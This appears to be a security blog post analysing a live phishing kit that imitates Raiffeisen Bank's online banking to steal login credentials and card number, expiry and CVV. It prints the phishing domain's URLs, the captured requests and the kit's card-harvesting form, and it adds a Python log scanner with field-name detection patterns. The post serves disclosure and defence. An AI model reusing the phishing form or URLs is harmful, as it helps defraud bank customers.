Theft of data from a Raiffeisen Bank card
What follows explains a scam used to phish the details of a Raiffeisen Bank card.
The link hidden under that button:
https://servinf.ballson.co.uk/servicii-online/internet-banking/?token=
With the token:
aLrZiNLkmhwMYwKRxcviqkIVHfJGujVAoubqpliHoqMvcenzNnkETGWZKsQwmxKtGgkyWihsXCzWjVAVyXFcBrKhMQDXaeMqeCdnQZDtAEnJGiOHVFTZZlfvMzTOcNxPBxgPyLTIvTfFCMWQlnVwfVhjkomvKrIHpbtkzYKLSSoCNnmniNuhAdUQMPRRDYeWmpDYmUgmbDoCSfcXJehLttWpzKXjGoyNANhFwJXXOxUgBNzovyyltEmzGJhqwgmONKlEaEwgJkOSJWWsviENaHlcIiXwxZHxdXggcceNCOwtLxlxJgOoPixnFABcXJGqRleANmXEbKoBzYDXZtLDGIKXtatWOeyRgYQxzpqudWkRKyEfVROHLXgvCIOVkKFMUiKJbaGkPjCPQwQhcASUJXVvOyuEHTXNdJvEMSuDaiTJvSPEfRfRuBGjutmcBEFijGjcoIEmXdcuFFPZuHqIoCYuyfPhdAAXHloDbSLrfDdsSrJNDPTOvSUVcqAHsQyLJbuzPBhmeVLgoKIvhOnIHXRPHUSlKiayNcnitZGiruMFUUJITStlXAgTbKcDIWMJrCKeGYOmxmYjCXmRxTodIZkTfmqURqcUlaDXqvchHxfNKzusnAzvKiNiFWysJzdJJJqRIMxwYjGsCEaTZerNEvlrdITKrKokKVppAAbYRAtJevpkfVNCTBCykMDUcXqgKOkaFbKlXNTryHEGODaBFcKCKSMUYYVEZtYgRWVcqMgDzVCnYMLcMdCuoKfxXLXlctdtqDVVOCoTvbRdEbkyeuSJjvncSPtsdVeqSrBrhrlLYBRDlJRPKiVNGFCVzgqFPsGkXLFBKBtSYtmNkLvhLKoXQDtvIXSQgFjeZiKtDgDXWxVfjFEGOuHzmJcPJjwzOZOsUTosnWPvABGEzuXJBQJtHUBpayAuIpSZaCWkwkuCtgdIbOLZurPdJJZSoNMJUaAPQYApxYsVmgNGcocWaHCsGxHgrTSWryWGCRlCMTftfftvAvdYvqPyLAVNSqpJuTWrefpxXjxgzwGBTlnpfjKblrcQxCHtogGphnSLLDzLPYQJMfXnMCzpzLhZPhkGWebiLEwlUBSdaNsZwsvSaObtWQNwpulbOAvbPKIvinkxZOauVVlPwbcmYrVeCZebuMdNxgHiGyWOujvVAktfRKjMlokoVgfdFEAkxAKLhSkTzxjCviwdTEoQICgivMXgRlzBrkxPkKTKfxlHQdcMxpAWIZpeHDbRBCXFhDNuSIncJjdzpCPZXbubtxFNbikAjHkUSEoaqcQKNoFzfcFZmtyETniwvyueZHWMIzXGwVJWUiybVINJOZMfNXPVZDdZlSqxgmdUAnRNLAJVJeXJLecWXQyWxeNXaRzINbWgtaQcocwrXbZBRHmnNRJhqqRWoussXiMlbWkCrQpkiltexJwWBUdmVOiycZCwkLzKpvZLAkYqyGLTTIQlHnSGcegozrXGvfSngxTDSSEtfcEHGbcQZGruimAHXRreMCQnTsFhMXWguEuRmlSeptabqwoqUMFtTzXFRsfUUACHdgvphKjgDSIqEtNJSnnhxJUtHDjiMaDuINbxKOuIphRPLVMtNQaCuuXGDWZzIYXGmIIjCrRDNZRWbenyPboCkHcgyAlXYKMmmHcDFkrVpJNezcTdpJBgQgGeFDZDFjpGKZmdRuouYIGyzWdDPxsYTqloXwUjccdGQHKlLEpJxjBRDHoMxuNJhjrcXamgKlorhuPhaXXxhPpeVXNbhLObDsPfrrficNZLBWRcBltgpFnDvxrimafrBWpjTOghEqfiLxnbdkcffNfKqLMYhclgjGAjKpaVCcxjucHvmShlwobJxQerWlSuayCDgwevuXQXcBKfNJoCudrMYyMnUOyitDTcswYuuChHdzIxPsYCqeUWAbLBimDQFfIdkkjZyoqjZkJfnKMRmIznKrtpqkSTtfjmSCqYkiuAtvhVgqEASUgtzkVhDJchbeiwMXdkcDea
KFWTGaUWtWaUWLiDfSMViZZkWjNgbXhPuRcmWwBnkneLxEbGAgFejnxdXEHlRWYmhCocLyzhTUMRmHoifzCNtXDjDUgfFWoFYXiIcAXutdnMRzwQQJZuhwRsrThTthStJvoBZQKnNktLrnNQNauFwlWgCgCNsvRGImLgmWBAibUskQhJXiHWcsqaFPKPDEezXQdiLMYwfykaRCrTkhSVMsWRvBOlPLbXlbsjWyLBzrQqttnLWWLvqFfFuDiKVcFJYCVoIJkoQyhaMSJHsVrtneNtzSteMTYLlWBhItTIKhgKUVuiQgzjMtRXnJiZrcbSAJzVFgxpzmHHuomLubTdqNNXdl&sacjioasp=6545321564589465320031215848945622031564897846512300321564894856200031256498465418798789456489&csopsnc=WIlKVDJWlZSRqQXaNrvQTJScIMEmxxhbRXFUBZRnouQRnDdOesWvNAQbBwDKJrhBVTymBJUgcYRINpcIsUHgvtsLnaRYDogtFdjnniNyfSrUnDLNOfjkRKtnsjiMdtIRJxEgShjIBILdBRdBVXZznmbCsYGwxdVsaOMRpHgbQfjafzUP
**I intentionally split that parameter out separately. Any attempt to access that link is entirely at your own risk.
That page submits a GET to:
https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=2d2dd&password=sdasss
With the payload (csrfmiddlewaretoken is the field name used by Django's CSRF protection, so the kit is either built on Django or imitating one):
csrfmiddlewaretoken: 3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6
number: 2d2dd
password: sdasss
And then a GET to:
https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v8032156/account/login/
With, as the request's Referer:
https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=222&password=23222
That is, exactly what I entered in the first step.
And it responds with a page almost identical to Raiffeisen Bank's:
It can be seen that this attack is fairly well put together. At this point the page presents what looks like a simple card verification step.
In principle the idea behind the attack is quite good, but it misses certain details that may make the victim suspicious, such as the placeholder text on the expiry-date input, which reads "Data expirăriin" with a stray trailing "n". Otherwise everything looks 1:1 with the real thing.
The form, which will submit with GET:
<form method="get" action="/persoane-fizice/produsele-noastre//v1558900348893/account/login/"><input type="hidden" name="csrfmiddlewaretoken" value="sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP">
<input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">
<input type="tel" class="inputat" name="aTMExpiryDateMM" id="" required="" maxlength="5" minlength="5" onkeyup="formatString(event);" placeholder="Data expirăriin">
<div class="inputing">
<input type="tel" class="inputat1" id="" name="atmPin" required="" maxlength="3" minlength="3" placeholder="CVV">
<img src="https://cdn.webcorp.com/img/faq/credit-card-cvv.png" alt="" width="82px" height="50px" style="margin: 17px;">
</div>
<input type="submit" style="background-color:#fff200; color: #000; font-family: Arial, Helvetica, sans-serif; font-weight: 700; font-size: 16px; border-color: #d9d9dd; " value="Continua">
</form>
Something extremely dangerous, which I have mentioned before in other banking attacks, is that the input:
<input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">
Offers browser autocomplete. Nothing in the markup disables it (there is no autocomplete="off"), and a 16-digit type="tel" field named atmCard is the kind of field that browser autofill heuristics can treat as a card-number field, so a victim with a saved card may be offered the real number without typing it:
And the validation behind it, which runs client-side in the script below, makes this page behave almost identically to a real one:
<script>
// Called on every keyup in the expiry field; rewrites the value into MM/YY as
// the victim types, so the field behaves like the real bank's widget.
function formatString(e) {
    var code = e.keyCode;
    var allowedKeys = [8]; // Backspace: leave the value alone so the user can correct it
    if (allowedKeys.indexOf(code) !== -1) {
        return;
    }
    e.target.value = e.target.value.replace(
        /^([1-9]\/|[2-9])$/g, '0$1/'             // 3 > 03/
    ).replace(
        /^(0[1-9]|1[0-2])$/g, '$1/'              // 11 > 11/
    ).replace(
        /^([0-1])([3-9])$/g, '0$1/$2'            // 13 > 01/3
    ).replace(
        /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
    ).replace(
        /^([0]+)\/|[0]+$/g, '0'                  // 0/ > 0 and 00 > 0
    ).replace(
        /[^\d\/]|^[\/]*$/g, ''                   // allow only digits and `/`
    ).replace(
        /\/\//g, '/'                             // prevent more than one `/`
    );
}
</script>
A GET is made to:
https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v1558900348893/account/login/?csrfmiddlewaretoken=sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP&atmCard=1234567891234567&aTMExpiryDateMM=02%2F23&atmPin=333
With the payload:
csrfmiddlewaretoken: sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP
atmCard: 1234567891234567
aTMExpiryDateMM: 02/23
atmPin: 333
And this is roughly where the scam ends. After this step nothing further happens except a redirect back to the same page. The card data has been sent and stored. What could follow after this step would be a 3D Secure screen, shown in the case of a valid card, to get a transaction approved as well. But the authors of this attack probably rely only on storing the data and will then try to probe it to see what amounts can be drawn from the cards without triggering 3D Secure. Note also that every harvesting step submits with GET, so the account number and password, and later the full card number, expiry and CVV, all travel in the query string, where they end up in the kit's access logs, in the victim's browser history and in any Referer header (as the second request above shows, its Referer still carried the first step's values).
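Because both harvesting steps put the stolen values in the query string of a GET, this kit is easy to spot in proxy or web-server logs. The following is an added Python example, not code from this post or from the phishing kit, that scans constructed proxy-log lines for GET requests carrying card data or credentials in the query string. The field names atmCard, aTMExpiryDateMM, atmPin, number and password come from the captured requests; the extra generic aliases, the log line format and the example.net line with the well-known Luhn-valid test number 4111111111111111 are assumptions made for the example.

```python
"""Added example (not from the post or the phishing kit): flag GET requests that
carry payment-card data or login credentials in the query string, the way the
kit described above exfiltrates them. Log format and generic field names are
assumptions; the two long URLs are the ones captured in the writeup."""
import re
from urllib.parse import parse_qs, urlsplit

# Field names from the captured requests (atmCard, aTMExpiryDateMM, atmPin,
# number, password) plus a few generic aliases assumed for other kits.
PAN_KEYS = {"atmcard", "cardnumber", "pan", "ccnumber"}
CVV_KEYS = {"atmpin", "cvv", "cvc", "cvv2"}
EXP_KEYS = {"atmexpirydatemm", "expiry", "expdate", "exp"}
CRED_KEYS = {"number", "username", "user", "password", "pass"}

EXPIRY_RE = re.compile(r"^(0[1-9]|1[0-2])/\d{2}$")   # MM/YY, as the kit formats it


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: True when the string is a well-formed card number."""
    if not digits.isdigit() or not 12 <= len(digits) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify_request(url: str) -> dict:
    """Describe which sensitive fields a single GET URL exposes in its query."""
    parts = urlsplit(url)
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    found = {"host": parts.hostname, "path": parts.path, "pan": None,
             "pan_luhn": False, "cvv": False, "expiry": False, "credential": False}
    for key, value in params.items():
        if key in PAN_KEYS and value.isdigit() and len(value) >= 12:
            found["pan"] = value
            found["pan_luhn"] = luhn_ok(value)
        elif key in CVV_KEYS and re.fullmatch(r"\d{3,4}", value):
            found["cvv"] = True
        elif key in EXP_KEYS and EXPIRY_RE.match(value):
            found["expiry"] = True
        elif key in CRED_KEYS and value:
            found["credential"] = True
    return found


def verdict(found: dict) -> str:
    """Rank a request: full card data outranks a bare credential pair."""
    if found["pan"] and (found["cvv"] or found["expiry"]):
        return "card-data-in-query"
    if found["credential"]:
        return "credential-in-query"
    return "clean"


# Constructed proxy-log excerpt: "<method> <url> <status>" per line. Lines 1-2
# are the captured requests from the writeup; line 3 is benign; line 4 uses the
# well-known Luhn-valid test number 4111111111111111 on an assumed host.
SAMPLE_LOG = """\
GET https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=2d2dd&password=sdasss 200
GET https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v1558900348893/account/login/?csrfmiddlewaretoken=sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP&atmCard=1234567891234567&aTMExpiryDateMM=02%2F23&atmPin=333 302
GET https://example.com/search?q=raiffeisen+internet+banking 200
GET https://example.net/pay?atmCard=4111111111111111&atmPin=123&aTMExpiryDateMM=11%2F26 200
"""


def scan_log(text: str) -> list:
    """Return one finding per GET line whose query string leaks card data or credentials."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        method, url, _status = line.split()
        if method != "GET":
            continue
        found = classify_request(url)
        found["verdict"] = verdict(found)
        if found["verdict"] != "clean":
            hits.append(found)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["verdict"], hit["host"], hit["path"],
              "luhn_ok=%s" % hit["pan_luhn"] if hit["pan"] else "")
```

Run against the sample log, the first captured request is reported as a credential leak and the second as card data; the Luhn flag stays False on the second because 1234567891234567 is a dummy number that does not pass the mod-10 check, while the constructed example.net line passes it. In a real deployment the Luhn result is useful for triage (a valid PAN means a victim typed a real card), but the verdict should fire on the field pattern alone, since the kit stores whatever it receives.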
Who is behind this scam?
Hard to say, because the whole thing appears to run on a throwaway .uk domain registered this year, and the text is translated too well, word for word. They also do not use junk URLs like those seen in the past, such as /abracadabra/cocojambo/; here they use /servicii-online/internet-banking/ and paths like /persoane-fizice/produsele-noastre//v123032566641/account/login/.
Another quite interesting thing is that they have installed a wildcard certificate covering multiple possible subdomains on that root domain:
Which probably means they host other kinds of attacks on other subdomains there.
*Any attempt to reproduce or investigate this attack is at your own risk. This attack is still active at the time of this report.